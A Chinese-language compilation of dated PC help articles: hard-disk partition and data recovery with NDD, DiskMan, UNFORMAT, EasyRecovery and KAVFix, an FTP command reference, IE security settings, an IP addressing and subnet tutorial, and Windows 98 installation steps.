系统分区不要太大，一般5～10G就可以了。

分区不要太多，这样会造成硬盘空间浪费，一般为四个分区最好。

重要数据要放在最不常用的一个分区，方便以后硬盘损坏恢复数据。

二、亡羊补牢，谈硬盘的数据恢复

    正所谓智者千虑，必有一失，无论再怎样小心使用你的硬盘，你也不能保证它不会来个罢工，所以，当硬盘出现故障时，我们就要仔细检查，对症下药了，下面，笔者就为大家介绍几种比较常见的硬盘故障的数据修复方法。

1.病症：分区表损坏时的数据修复

推荐工具：诺顿磁盘医生NDD

解决方案：

    硬盘主引导记录(MBR)所在的扇区也是病毒重点攻击的地方，通过破坏主引导扇区中的DPT(分区表)，就可以轻易地损毁硬盘分区信息，达到对资料的破坏目的。分区表的损坏是分区数据被破坏而使记录被破坏的。所以，我们可以使用软件来进行修复。一般情况下，硬盘分区之后，要备份一份分区表至软盘、光盘或者移动存储活动盘上。在这方面，国内著名的杀毒软件KV3000系列和瑞星都提供了完整的解决方案。但是，对于没有备份分区表的硬盘来说，虽然KV3000也提供了相应的修复方法，不过成功率相对就要低很多了。在恢复分区上，诺顿磁盘医生NDD是绝对强劲的工具，可以自动修复分区丢失等情况，可以抢救软盘坏区中的数据，强制读出后搬移到其它空白扇区。在硬盘崩溃或异常的情况下，它可能带给用户一线希望。在出现问题后，用启动盘启动，运行NDD，选择Diagnose进行诊断。NDD会对硬盘进行全面扫描，如果有错误的话，它会向你提示，然后只要根据软件的提示选择修复项目即可，而且这些问题它都能轻轻松松地解决。

    另外，大家非常熟悉的中文磁盘工具DiskMan，在重建分区表方面具有非常实用的功能，用于修复分区表的损坏是最合适不过了。如果硬盘分区表被分区调整软件(或病毒)严重破坏，必将引起硬盘和系统瘫痪的严重后果，而DiskMan可通过未被破坏的分区引导记录信息重新建立分区表。只要在菜单的工具栏中选择“重建分表”，DiskMan即开始搜索并重建分区。使用过程之中，DiskMan将首先搜索0柱面0磁头从2扇区开始的隐含扇区，寻找被病毒挪动过的分区表。紧接着要搜索每个磁头的第一个扇区。整个搜索过程是采用“自动”或“交互”两种方式进行。自动方式保留发现的每一个分区，适用于大多数情况。交互方式对发现的每一个分区都会给出提示，由用户选择是否保留。当采用自动方式重建的分区表一旦出现不正确的故障时，我们可以采用交互方式重新进行搜索。

    但是，重建分区表功能也不能保证做到百分之百的修复好硬盘分区表。所以最好是平时一定要做好分区表的备份工作；如果没有做备份的话，请下载一个DISKGEN软件，然后在工具选项中，选备份分区表，一般默认是备份到软驱上面的，当然你也可以把它刻录在光盘上面。

2.病症：零磁道损坏时的数据恢复

推荐工具：DiskMan

解决方案：

    硬盘的主引导记录区(MBR)在零磁道上。MBR位于硬盘的0磁道0柱面1扇区，其中存放着硬盘主引导程序和硬盘分区表。在总共512字节的硬盘主引导记录扇区中，446字节属于硬盘主引导程序，64字节属于硬盘分区表(DPT)，两个字节(55 AA)属于分区结束标志。零磁道一旦受损，将使硬盘的主引导程序和分区表信息将遭到严重破坏，从而导致硬盘无法引导。0磁道损坏判断：系统自检能通过，但启动时，分区丢失或者C盘目录丢失，硬盘出现有规律的“咯吱……咯吱”的寻道声，运行SCANDISK扫描C盘，在第一簇出现一个红色的“B”，或者Fdisk找不到硬盘、DM死在0磁道上，此种情况即为零磁道损坏！零磁道损坏属于硬盘坏道之一，只不过它的位置相当重要，因而一旦遭到破坏，就会产生严重的后果。通常0磁道损坏的硬盘，可以通过PCTOOLS的DE磁盘编辑器(或者DiskMan)来使0磁道偏转一个扇区，使用1磁道来作为0磁道来进行使用。而数据可以通过Easyrecovery来按照簇进行恢复，但数据无法保证得到完全恢复。
3.病症：格式化硬盘后数据的恢复

推荐工具：DOS命令UnFormat

解决方案：

    在DOS高版本状态下，格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。我们都知道在DOS时代有一个非常不错的工具UnFormat，它可以恢复由Format命令清除的磁盘。如果用户是在DOS下使用Format命令误格式化了某个分区的话，可以使用该命令试试。不过UnFormat只能恢复本地硬盘和软件驱动器，而不能恢复网络驱动器。UnFormat命令除了上面的反格式化功能，它还能重新修复和建立硬盘驱动器上的损坏分区表。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。

4.病症：文件丢失后的数据恢复

推荐工具：EasyRecovery

解决方案：

    在日常使用中，由于误删除或系统出错等原因，会让我们误删除或丢失一些重要数据。在这个时候一定要记住，千万不要再向该分区或者磁盘写入信息，因为刚被删除的文件被恢复的可能性最大。实际上当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变。由于删除与格式化操作对于文件的数据部分实质上丝毫未动，这样，就给文件恢复提供了可能性。我们只要利用一些反删除软件(它的工作原理是通过对照分区表来恢复文件的)，用户可以轻松地实现文件恢复的目的。同时误格式化同误删除的恢复方法在使用上基本上没有大的区别，只要待恢复的文件所占用的簇不被其他文件占用，大部分数据仍是可以被恢复的。而且如果你的Windows系统还可以正常使用的话，那么最简单的恢复方法就是用Windows版EasyRecovery软件。
实例分析：

    进入主界面，主窗口中显示了系统中硬盘的分区情况，其中有几个Unknown File System Type，这是当初用Fdisk误删除的几个FAT分区。

    我们先选中需要修复的1.74G大小的分区，再点击“Next”按钮进入第二步。

  该窗口显示了所选分区在整个硬盘中的分布情况，并且可以手工决定分区的开始和结束扇区。一般情况下我们不需要动这些数据，点击“Next”进入如下界面，
  这个窗口用来选择文件系统类型和分区扫描模式。文件系统类型有：FAT12、FAT16、FAT32、NTFS和RAW可选。RAW模式用于修复无文件系统结构信息的分区。RAW模式将对整个分区的扇区一个个地进行扫描。该扫描模式可以找回保存在一个簇中的小文件或连续存放的大文件。

    分区扫描模式有“Typical Scan”和“Advanced Scan”两种。Typical模式只扫描指定分区结构信息，而Advanced模式将穷尽扫描全部分区的所有结构信息，当然花的时间也要长些。

在这个例子中，我们选RAW和Typical Scan模式来对分区进行修复。点击“Next”按钮进入到对分区的扫描和修复状态，
从窗口中可以看得出，EasyRecovery将修复出来的文件按后缀名进行了分类。我们可以对我们需要保存的文件进行标记，比如标记那些文档文件（.DOC）、图形文件（.DWG）等重要数据文件。在Destination框中填入要保存到的地方（非正在修复的分区中）。点击“Next”，会弹出一个窗口提示是否保存Report，点击“Yes”并选中一个目录保存即可。
等标记过的文件复制完毕成后，就可以到D:Recovered目录下找到修复出来的文件了。

5.病症：硬盘硬故障的数据恢复

推荐工具：螺丝刀，数据线，酒精，棉花......

解决方案：

    当硬盘出现硬件故障，即开机无法检测到硬盘，而且硬盘出现不正常的声音等状况时，很大可能就是硬盘损坏了。这时最直接的解决方法就是去找经销商，当然，现在一般的硬盘都有提供至少一年的质保，问题是厂商只负责修复硬盘，而不负责数据的恢复。如果你硬盘正好有很重要的文件的话，笔者建议你直接找专业的数据恢复公司帮你解决，当然，专业的数据恢复的收费也是蛮高的。如果你想省下一笔银子，又具有DIY的精神，那笔者的一些经验也许可以帮到你。

    当出现以上情况时，这时最需要的就是仔细观察和耐心检测了。一般来说，如果盘片出现问题，基本上想恢复数据是不大可能了，而其他地方出现的问题，像控制电路、电机和磁头这些部件的话，还可以通过一些小技巧碰碰运气。

根据笔者的经验，一般硬盘比较容易出故障的地方就在驱动芯片（如上图）上。判断方法就是看驱动芯片的温度。如果发现驱动芯片发热里异常的话，那很有可能就是它的问题了。解决方法：找一块正常的硬盘，接好双硬盘数据线，正常的硬盘要作为备份数据和开机启动用。然后为坏的硬盘做好散热装备，一般找块显卡的散热器和风扇贴在硬盘驱动芯片上就可以了。利用那块正常的硬盘做为引导，自检过后，马上把电源线插孔插到坏的硬盘上，进入系统后，双击我的电脑，如果运气好的话，应该可以进入硬盘，然后马上把数据拷贝到正常的那块硬盘上，然后再把坏的硬盘送到维修。

    还有一个比较常见的硬盘错误提示就是“HDD Not Detected”，这也是一个硬故障。遇到这种情况你可以试试检查硬盘外部数据信号线的接口是否有变形，接口焊点是否存在虚焊。排除以上的可能后，取下硬盘后盖，露出电路控制板（如下图）。
  拧下控制板上的固定螺丝，将控制板与硬盘主体分离。这时可以看见硬盘主体的两排弹簧片。一排作为主电机的电源，另一排作为硬盘主体的磁头机械臂驱动线圈电源以及硬盘主体与电路控制板间数据传输接口。对于无特殊封装的硬盘，往往可以看见弹簧片与控制电路板对应部位均有灰尘。用脱脂棉蘸无水酒精清洁，对弹簧片变形的部位校形，并除去氧化层，一般情况下均可恢复正常。不过这个是对于那些已经过了保修期的用户而言，如果还没过保修期的，这样做的后果就是JS们不会承认你的硬盘质保了。

    上面是笔者总结的几条经验，但是，毕竟硬盘损坏是一个比较麻烦的问题，有些方法也可能是运气好一时凑效而已。最保险的方法就是平时做好备份工作，把重要的数据文件刻录进光盘里，这样做也比较经济，不然等到数据丢失了要找数据恢复公司帮忙的时候，不仅花钱多了很多，能不能恢复数据一个大问题来的。


用毒霸备份和恢复您的硬盘分区

《一键清理系统垃圾》

用毒霸备份和恢复您的硬盘分区

如果你的硬盘被病毒损坏，如果你的数据丢失，你是不是自认倒霉，从头来过？其实大可不必，如果我们在这之前，稍稍做一些防范工作，也许就可以挽回损失，得与失就在这一线之间，你愿意尝试一下吗？

    《金山毒霸》附带的磁盘工具KAVFix就是一个备份和恢复硬盘分区的小工具，它可以在DOS、Windows 9x/2000/NT系统中直接使用（大小为110KB，在毒霸的安装目录中能够找到，我个人喜欢用毒霸2001版带的DOS版的KAVFix，后来的那个图形界面的我不习惯）。

    首先运行KAVFix命令，会看到如图所示的提示（都是E文的，不过毒霸的说明书中有简单的翻译）。

    一、失去方知珍贵

    要想数据失而复得，首先要对硬盘分区进行备份：

    运行 KAVFix，选择 0 修复硬盘，提示选择物理硬盘：
    Please input harddisk(0, 1, 2, ...):

    输入待修硬盘盘号（第一块硬盘为0，其他的顺延）。
    Do you want to backup MBR for undo (Y/N)?

    提示备份主引导区数据用于修复失败后恢复，选择“Y”。
    Please input MBR backup file name:

    输入备份文件名称。

    **建议使用可靠的软盘，将一张干净的磁盘插入软驱，输入路径和一个文件名如　　　　a:mydisk1。

    Reading MBR sector...ok!
    Saving to file...ok!
    表示备份成功。

    Do you want to backup the boot record of logic drive(Y/N):
    是否备份逻辑分区（一般是指后面的分区），选择“Y”。
    Backup file OK!备份完成。

    一旦硬盘损坏，备份的小文件也许就是你的救命稻草了！

    Do you want to Rebuild the C Drive(Y/N)?
    为了确保只进行分区的调整，建议您使用“N”的选项，不要重新Rebuild C 盘。

    Do you want to backup sector for undo (Y/N)?
    提示备份修复时将被修改的数据，用于修复失败后恢复：

    如果我们不选择Rebuild C盘，那么这个备份也可以省了。

    Do you want to write Rebuild Partition Table to MBR(Y/N)?
    修复后KAVFix将问您是否将已修好的数据写入硬盘的主引导区，请按“Y”确认。

    至此 KAVFix 已经修复了您的硬盘，请按“Q” 键退出。

    重新启动机器，根据我的经验应该说有70%的可能，可以找回您的硬盘和数据了。另外根据测试，KAVFix在Windows 2000系统中使用时对于大于8GB的硬盘的恢复效果比DOS方式要好。您可以将有问题的硬盘挂在其他Windows 2000系统中作为从盘，通过在主盘的Windows 2000中使用KAVFix来进行恢复（当然了选择硬盘编号时注意选择1就是了）。

    这里不得不提的是KAVFix的9号功能“Destory Hard Disk MBR（清除主引导记录扇区标志）”这是删除当前分区信息的命令，在当前分区信息出错的情况下清除出错信息，平时请大家不要使用，否则可就不得不自己动手进行恢复了。

    如果硬盘中真的有重要数据的话，也可以考虑到专业的数据恢复公司进行处理，金山好像就有（不过听说数据恢复的价格比买块硬盘的价格还高呢，倒是恢复不了不收费）。还是使用KAVFix自己先做个备份吧！


力挽狂澜：硬盘数据拯救全攻略

《一键清理系统垃圾》

返回总目录 上一页 目录页

力挽狂澜：硬盘数据拯救全攻略

  为了有效地保存硬盘中的数据，除了经常性地进行备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者从坏的区域中提取出有用的数据，把损失降到最小程度。

    系统不认硬盘

    系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法

发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。 　　CMOS引起的故障

    CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

    主引导程序引起的启动故障

    主引导程序位于硬盘的主引导扇区，主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱启动之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的FDISK最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，FDISK.EXE之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS 3.x到Windos 95的DOS，只要找到一种DOS引导盘启动系统并运行此程序即可修复。

    分区表错误引发的启动故障

    分区表错误是硬盘的严重错误，不同的错误程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过FDISK重置活动分区进行修复。

    如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS分区值是05。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。

    分区表中还有其它数据用于记录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，可用的方法是用备份的分区表数据重新写回，或者从其它的相同类型的并且分区状况相同的硬盘上获取分区表数据。

    恢复的工具可采用NU等工具软件，操作非常方便。当然也可采用DEBUG进行操作，但操作繁琐并且具有一定的风险。
分区有效标志错误的故障

    在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节：“55aa”，此字节为扇区的有效标志。当从硬盘、软盘或光盘启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此处可用于整个硬盘的加密技术，可采用DEBUG方法进行恢复处理。另外，当DOS引导扇区无引导标志时，系统启动将显示为：“Mmissing Operating System”。方便的方法是使用下面的DOS系统通用的修复方法。

    DOS引导系统引起的启动故障

    DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括IO.SYS、MSDOS.SYS、COMMAND.COM，其中COMMAND.COM是DOS的外壳文件，可用其它的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS系统中，MSDOS.SYS是一个文本文件，是启动Windows必须的文件，但只启动DOS时可不用此文件。DOS引导出错时，可从软盘或光盘引导系统后使用SYS C:命令传送系统，即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

    FAT表引起的读写故障

    FAT表记录着硬盘数据的存储地址，每一个文件都有一组FAT链指定其存放的簇地址。FAT表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个FAT表，如果目前使用的FAT表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其FAT表的长度及第二个FAT表的地址也是不固定的，所以修复时必须正确查找其正确位置，一些工具软件如NU等本身具有这样的修复功能，使用也非常的方便。采用DEBUG也可实现这种操作，即采用其m命令把第二个FAT表移到第一个表处即可。如果第二个FAT表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用CHKDSK或SCANDISK命令进行修复，最终得到*.CHK文件，这便是丢失FAT链的扇区数据。如果是文本文件则可从中提取出完整的或部分的文件内容。

    目录表损坏引起的引导故障

    目录表记录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号。目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用CHKDSK或SCANDISK程序恢复的方法，从硬盘中搜索出*.CHK文件，由于目录表损坏时仅是首簇号丢失，每一个*.CHK文件即是一个完整的文件，把其改为原来的名字即可恢复大多数文件。

    误删除分区时数据的恢复

    当用FDISK删除了硬盘分区之后，表面上是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示为无效驱动器。如果了解FDISK的工作原理，就会知道FDISK只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容，具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变。可仿照上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区及数据。如果已经对分区格式化，在先恢复分区后，可按下面的方法恢复分区数据。

    误格式化硬盘数据的恢复

    在DOS高版本状态下，FORMAT格式化操作在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区、FAT分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行UNFORMAT命令即可恢复。另外DOS还提供了一个MIROR命令用于记录当前磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


数据恢复

《一键清理系统垃圾》

返回总目录

数据恢复

◎数据恢复全解析
◎NTFS格式大硬盘数据恢复特殊案例
◎教你Word文档丢失的预防与数据的恢复
◎拯救Word 2000损坏文档
◎救回死机后Word未储存的资料
◎一些常用文件的修复
◎软件故障的排困解难
◎我拿什么拯救你，我的数据
◎硬盘数据拯救全攻略
◎分区有效标志错误的故障
◎硬盘数据恢复入门教程
◎数据恢复的方法
◎数据恢复简介
◎软件修复文件 拯救光盘中的数据
◎BOIS类数据恢复
◎硬盘软硬故障之维护
◎拿什么来拯救你之硬盘数据抢救经验谈
◎用毒霸备份和恢复您的硬盘分区
◎力挽狂澜：硬盘数据拯救全攻略

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


FTP命令详解

《一键清理系统垃圾》

返回总目录 目录页 下一页

FTP命令详解

ascii: 设定以ASCII方式传送文件(缺省值)
bell: 每完成一次文件传送,报警提示.
binary: 设定以二进制方式传送文件.
bye: 终止主机FTP进程,并退出FTP管理方式.
cd: 同UNIX的CD命令.
cdup: 返回上一级目录.
chmod: 改变远端主机的文件权限.
close: 终止远端的FTP进程,返回到FTP命令状态,所有的宏定义都被删除.
delete: 删除远端主机中的文件.
dir [remote-directory] [local-file]列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件.
get [remote-file] [local-file]从远端主机中传送至本地主机中.
help [command]输出命令的解释.
lcd: 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录.
ls [remote-directory] [local-file]同DIR.
macdef: 定义宏命令.
mdelete [remote-files]删除一批文件.
mget [remote-files]从远端主机接收一批文件至本地主机.
mkdir directory-name在远端主机中建立目录.
mput local-files将本地主机中一批文件传送至远端主机.
open host [port]重新建立一个新的连接.
prompt: 交互提示模式.
put local-file [remote-file]将本地一个文件传送至远端主机中.
pwd: 列出当前远端主机目录.
quit: 同BYE.
recv remote-file [local-file]同GET.
rename [from] [to]改变远端主机中的文件名.
rmdir directory-name删除远端主机中的目录.
send local-file [remote-file]同PUT.
status: 显示当前FTP的状态.
system: 显示远端主机系统类型.
user user-name [password] [account]重新以别的用户名登录远端主机.
?: 同HELP.


IE浏览器的安全

《一键清理系统垃圾》

IE浏览器的安全

1. 恶意代码
   网页中的恶意代码越来越严重地威胁着我们的安全，因为恶意代码具有比较大的隐蔽性，到目前为止，还没有什么病毒防火墙能很好地阻止恶意代码的攻击，大多数甚至根本就不能被发现。如ActiveX、JavaScoript代码，有些个人网站制作的恶意代码会让你打开无数页面导致系统资源耗尽，使计算机瘫痪；还可以读取你本地硬盘上任何IE可以打开的文件，严重的还可以格式化硬盘，对这些代码，在浏览网页时可能会提示你是否下载，除非你知道自己在做什么，否则不要随便回答“是”。对于这类问题可以采用关闭JavaScript和ActiveX来解决，单击“工具”---“Internet选项”---“安全”，并单击标签中的“自定义级别”按钮，在打开的“安全设置”对话框中找到关于ActiveX控件和JavaScript的设置，然后选择“禁用”或“提示”。

2. IE的自动完成
   IE的自动完成功能给用户填写表单和输入Web地址带来一定的舍不得，但在网吧上网就不够安全了，你可点击“工具”---“Internet选项”内容，“在个人信息区域”单击“自动”按钮，在随后的自动完成设置对话框内清除Web地址、表单及表单的用户名和密码项的选择。若需清除以前的自动完成历史记录，只需单击该对话框的“清除表单”和“清除密码”按钮既可。


IP地址从头说

《一键清理系统垃圾》

IP地址从头说

   随着电脑技术的逐步普及和因特网技术的迅猛发展，学习因特网、利用因特网已不再是那些腰缠万贯的大款和戴着深度眼镜的专业技术人员的专利，它已作为二十一世纪人类的一种新的生活方式而逐步深入到寻常百姓家。谈到因特网，IP地址就不能不提，因为无论是从学习还是使用因特网的角度来看，IP地址都是一个十分重要的概念，INTERNET的许多服务和特点都是通过IP地址体现出来的。

一、IP地址的概念
   我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时，在它们所传送的数据包里都会含有某些附加信息，这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样，人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址，该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定，IP地址是由32位二进制数组成，而且在INTERNET范围内是唯一的。例如，某台联在因特网上的计算机的IP地址为：11010010 01001001 10001100 00000010很明显，这些数字对于人来说不太好记忆。人们为了方便记忆，就将组成计算机的IP地址的32位二进制分成四段，每段8位，中间用小数点隔开，然后将每八位二进制转换成十进制数，这样上述计算机的IP地址就变成了：210.73.140.2。

二、IP地址的分类
   我们说过因特网是把全世界的无数个网络连接起来的一个庞大的网间网，每个网络中的计算机通过其自身的IP地址而被唯一标识的，据此我们也可以设想，在INTERNET上这个庞大的网间网中，每个网络也有自己的标识符。这与我们日常生活中的电话号码很相像，例如有一个电话号码为0515163，这个号码中的前四位表示该电话是属于哪个地区的，后面的数字表示该地区的某个电话号码。与上面的例子类似，我们把计算机的IP地址也分成两部分，分别为网络标识和主机标识。同一个物理网络上的所有主机都用同一个网络标识，网络上的一个主机（包括网络上工作站、服务器和路由器等）都有一个主机标识与其对应?IP地址的4个字节划分为2个部分，一部分用以标明具体的网络段，即网络标识；另一部分用以标明具体的节点，即主机标识，也就是说某个网络中的特定的计算机号码。例如，盐城市信息网络中心的服务器的IP地址为210.73.140.2，对于该IP地址，我们可以把它分成网络标识和主机标识两部分，这样上述的IP地址就可以写成： 网络标识：210.73.140.0 主机标识： 2 合起来写：210.73.140.2
   由于网络中包含的计算机有可能不一样多，有的网络可能含有较多的计算机，也有的网络包含较少的计算机，于是人们按照网络规模的大小，把32位地址信息设成三种定位的划分方式，这三种划分方法分别对应于A类、B类、C类IP地址。

1．A类IP地址
   一个A类IP地址是指，在IP地址的四段号码中，第一段号码为网络号码，剩下的三段号码为本地计算机的号码。如果用二进制表示IP地址的话，A类IP地址就由1字节的网络地址和3字节主机地址组成，网络地址的最高位必须是“0”。A类IP地址中网络的标识长度为7位，主机标识的长度为24位，A类网络地址数量较少，可以用于主机数达1600多万台的大型网络。

2．B类IP地址
   一个B类IP地址是指，在IP地址的四段号码中，前两段号码为网络号码，B类IP地址就由2字节的网络地址和2字节主机地址组成，网络地址的最高位必须是“10”。B类IP地址中网络的标识长度为14位，主机标识的长度为16位，B类网络地址适用于中等规模的网络，每个网络所能容纳的计算机数为6万多台。

3．C类IP地址
   一个C类IP地址是指，在IP地址的四段号码中，前三段号码为网络号码，剩下的一段号码为本地计算机的号码。如果用二进制表示IP地址的话，C类IP地址就由３字节的网络地址和1字节主机地址组成，网络地址的最高位必须是“110”。C类IP地址中网络的标识长度为21位，主机标识的长度为8位，C类网络地址数量较多，适用于小规模的局域网络，每个网络最多只能包含254台计算机。
   除了上面三种类型的IP地址外，还有几种特殊类型的IP地址，TCP/IP协议规定，凡IP地址中的第一个字节以“lll0”开始的地址都叫多点广播地址。因此，任何第一个字节大于223小于240的IP地址是多点广播地址；IP地址中的每一个字节都为0的地址（“0.0.0.0”）对应于当前主机；IP地址中的每一个字节都为1的IP地址（“255．255．255．255”）是当前子网的广播地址；IP地址中凡是以“llll0”的地址都留着将来作为特殊用途使用；IP地址中不能以十进制“127”作为开头，27．1．1．1用于回路测试，同时网络ID的第一个6位组也不能全置为“0”，全“0”表示本地网络。

三、IP的寻址规则

1.网络寻址规则
   A、 网络地址必须唯一。
   B、 网络标识不能以数字127开头。在A类地址中，数字127保留给内部回送函数。
   C、 网络标识的第一个字节不能为255。数字2５5作为广播地址。
   D、 网络标识的第一个字节不能为“0”，“0”表示该地址是本地主机，不能传送。

2.主机寻址规则
   A、主机标识在同一网络内必须是唯一的。
   B、主机标识的各个位不能都为“1”，如果所有位都为“1”，则该机地址是广播地址，而非主机的地址。
   C、主机标识的各个位不能都为“0”，如果各个位都为“0”，则表示“只有这个网络”，而这个网络上没有任何主机。

四、IP子网掩码概述

1.子网掩码的概念
   子网掩码是一个32位地址，用于屏蔽IP地址的一部分以区别网络标识和主机标识，并说明该IP地址是在局域网上，还是在远程网上。

2.确定子网掩码数
   用于子网掩码的位数决定于可能的子网数目和每个子网的主机数目。在定义子网掩码前，必须弄清楚本来使用的子网数和主机数目。
   定义子网掩码的步骤为：
   A、确定哪些组地址归我们使用。比如我们申请到的网络号为 “210.73.a.b”，该网络地址为c类IP地址，网络标识为“210.73”，主机标识为“a.b”。
   B、根据我们现在所需的子网数以及将来可能扩充到的子网数，用宿主机的一些位来定义子网掩码。比如我们现在需要12个子网，将来可能需要16个。用第三个字节的前四位确定子网掩码。前四位都置为“1”，即第三个字节为“11110000”，这个数我们暂且称作新的二进制子网掩码。
   C、把对应初始网络的各个位都置为“1”，即前两个字节都置为“1”，第四个字节都置为“0”，则子网掩码的间断二进制形式为：“11111111.11111111.11110000.00000000”
   D、把这个数转化为间断十进制形式为：“255.255.240.0” 这个数为该网络的子网掩码。

3.IP掩码的标注
   A、无子网的标注法
   对无子网的IP地址，可写成主机号为0的掩码。如IP地址210.73.140.5，掩码为255.255.255.0，也可以缺省掩码，只写IP地址。

   B、有子网的标注法
   有子网时，一定要二者配对出现。以C类地址为例。
   1.IP地址中的前3个字节表示网络号，后一个字节既表明子网号，又说明主机号，还说明两个IP地址是否属于一个网段。如果属于同一网络区间，这两个地址间的信息交换就不通过路由器。如果不属同一网络区间，也就是子网号不同，两个地址的信息交换就要通过路由器进行。例如：对于IP地址为210.73.140.5的主机来说，其主机标识为00000101，对于IP地址为210.73.140.16的主机来说它的主机标识为00010000，以上两个主机标识的前面三位全是000，说明这两个IP地址在同一个网络区域中，这两台主机在交换信息时不需要通过路由器进行。10.73.60.1的主机标识为00000001，210.73.60.252的主机标识为11111100，这两个主机标识的前面三位000与011不同，说明二者在不同的网络区域，要交换信息需要通过路由器。其子网上主机号各为1和252。
   2.掩码的功用是说明有子网和有几个子网，但子网数只能表示为一个范围，不能确切讲具体几个子网，掩码不说明具体子网号，有子网的掩码格式(对C类地址):

五、IP的其他事项

   1.一般国际互联网信息中心在分配IP地址时是按照网络来分配的，因此只有说到网络地址时才能使用A类、B类、C类的说法；
   2.在分配网络地址时，网络标识是固定的，而计算机标识是可以在一定范围内变化的，下面是三类网络地址的组成形式：
   A类地址:73.0.0.0
   B类地址:160.153.0.0
   C类地址:210.73.140.0
   上述中的每个0均可以在0~255之间进行变化。
   3.因为IP地址的前三位数字已决定了一个IP地址是属于何种类型的网络，所以A类网络地址将无法再分成B类IP地址，B类IP地址也不能再分成C类IP地址。
   4.在谈到某一特定的计算机IP地址时不宜使用A类、B类、C类的说法，但可以说主机地址是属于哪一个A类、B类、C类网络了。
   通过上面的学习，大家对IP地址肯定有了了解。有了IP地址大家就可以发送电子邮件了，并且可以获得Internet网上的其他信息，例如可以获得Internet上的WWW服务、BBS服务、FTP服务等等。


Windows 98安装全过程

《一键清理系统垃圾》

Windows 98安装全过程

1、首先在DOS环境下安装，进入DOS后转到您要安装WINDOWS 98的目录盘下（一般为C盘）。在确定格式化C盘以后转到WINDOWS 98的安装盘所在的目录下，运行SETUP回车即可开始安装。
2、在安装开始前，先会调用SCANDISK程序对您的电脑系统进行检测，结束后按“EXIT”退出。然后便会出现“欢迎安装WINDOWS 98”界面。可以看到左边是安装的进度显示，目前处在“WINDOWS 98安装程序将开始运行”——WINDOWS 98安装程序的第一部分。
3、用鼠标单击“继续”按钮，WINDOWS 98安装程序便开始对系统和驱动器进行常规检查，一切正常的话按“继续”按钮，WINDOWS 98开始准备“安装向导”。自此，你可以让计算机自己操作，一切进展情况可以从屏幕中的进度条中了解。此间大约需要2分钟。
4、现在，屏幕上又会出现“软件许可协议”对话框，点选“接受协议”方可进行“下一步”，否则安装不能进行。
5、紧接着，出现了“产品密钥”输入框，你可从软盘中附有的说明中找到WINDOWS 98的序列号，输入无误后单击“下一步”按钮。
6、OK，现在WINDOWS 98安装程序进入第二部分：“正在收集计算机的相关信息”。WINDOWS 98对系统进行检查，确保有足够的硬盘空间来安装WINDOWS 98。
